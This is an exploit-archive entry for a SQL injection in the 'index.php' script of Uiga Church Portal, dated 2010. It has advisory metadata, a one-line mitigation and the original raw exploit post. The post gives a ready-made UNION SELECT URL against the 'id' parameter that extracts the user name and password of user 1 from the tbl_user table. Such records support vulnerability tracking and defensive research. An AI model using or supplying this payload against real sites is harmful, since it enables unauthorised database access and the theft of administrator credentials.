Uiga Church Portal index.php SQL Injection

vendor:

Uiga Church Portal

by:

Easy Laster

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Uiga Church Portal

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

Uiga Church Portal index.php SQL Injection

The vulnerability exists in the 'index.php' script of Uiga Church Portal, which allows an attacker to inject arbitrary SQL commands via the 'id' parameter in the 'view=read' module.

Mitigation:

Input validation should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

----------------------------Information------------------------------------------------
+Name : Uiga Church Portal index.php SQL Injection
+Autor : Easy Laster
+Date   : 03.03.2010
+Script  : Uiga Church Portal
+Download : http://www.uiga.com/downloads/ucp_pro.zip
+Price : 00,00$
+Language :PHP
+Discovered by Easy Laster
+Security Group 4004-Security-Project
+Greetz to Team-Internet ,Underground Agents
+And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,
Kiba,-tmh-,Dr Chaos,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,
N00bor,Damian,novaca!ne.
---------------------------------------------------------------------------------------
                                                                                     
 ___ ___ ___ ___                         _ _           _____           _         _   
| | |   |   | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___|  _  |___ ___  |_|___ ___| |_ 
|_  | | | | |_  |___|_ -| -_|  _| | |  _| |  _| | |___|   __|  _| . | | | -_|  _|  _|
  |_|___|___| |_|   |___|___|___|___|_| |_|_| |_  |   |__|  |_| |___|_| |___|___|_|  
                                              |___|                 |___|            


----------------------------------------------------------------------------------------
+Vulnerability : http://www.site.com/portal/index.php?view=read&id=
+Exploitable   : http://www.site.com/portal/index.php?view=read&id=111111111+union+
select+1,concat(user_name,0x3a,password),3,4,5,6,7,8,9,10,11,12+from+tbl_user
+where+user_id=1--
-----------------------------------------------------------------------------------------